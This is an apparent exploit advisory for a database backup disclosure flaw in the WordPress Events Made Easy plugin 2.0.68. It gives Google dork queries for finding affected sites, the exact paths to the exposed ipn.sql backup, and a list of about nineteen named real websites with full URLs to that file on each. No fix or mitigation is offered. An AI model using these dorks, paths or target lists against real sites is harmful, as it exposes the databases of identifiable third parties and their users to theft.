WordPress Events Made Easy plugin version 2.0.68 suffers from a database disclosure vulnerability.
64595d32b5aeeb02eb9827ef3bc9e0d3#################################################################################################
# Exploit Title : WordPress Events Made Easy Plugins 2.0.68 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 06/12/2018
# Vendor Homepage : wordpress.org/plugins/events-made-easy/
# Software Download Link :
downloads.wordpress.org/plugin/events-made-easy.2.0.68.zip
+ github.com/wp-plugins/events-made-easy/archive/master.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.0.68
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/events-made-easy/''
intext:''Designed by www.diablodesign.eu.''
intext:''Powered by WordPress , Designed and Developed by templatesnext''
intext:''Copyright : Acole les Saints Anges''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/events-made-easy/paypal/scripts/ipn.sql
/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
#################################################################################################
# Example Vulnerable Sites =>
[+]
triskelartscentre.ie/content/wp-content/plugins/events-made-easy/paypal/scripts/ipn.sql
[+]
sites.nd.edu/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
njad.ca/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
affordablelifeandhealthcare.com/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
storefront.iamcostumecrazee.com/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
tworiversuu.org/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
rokietnica.nazwa.pl/newpage/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
worldsingingday.com.au/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
fpvrace28.fr/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
grasdalungdomshus.com/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
chunghuaserembanalumni.org/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
angliiskiezik.bg/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
bostonediscovery.com/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
brno-cernovice.cz/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
ulkus.ch/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
diepartei-koblenz.de/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
lessaintsanges.com/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
meircsa.com/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
[+]
ruslanogorodnik.com/lr-travellers/wp-content/plugins/events-made-easy/payment_gateways/paypal/scripts/ipn.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################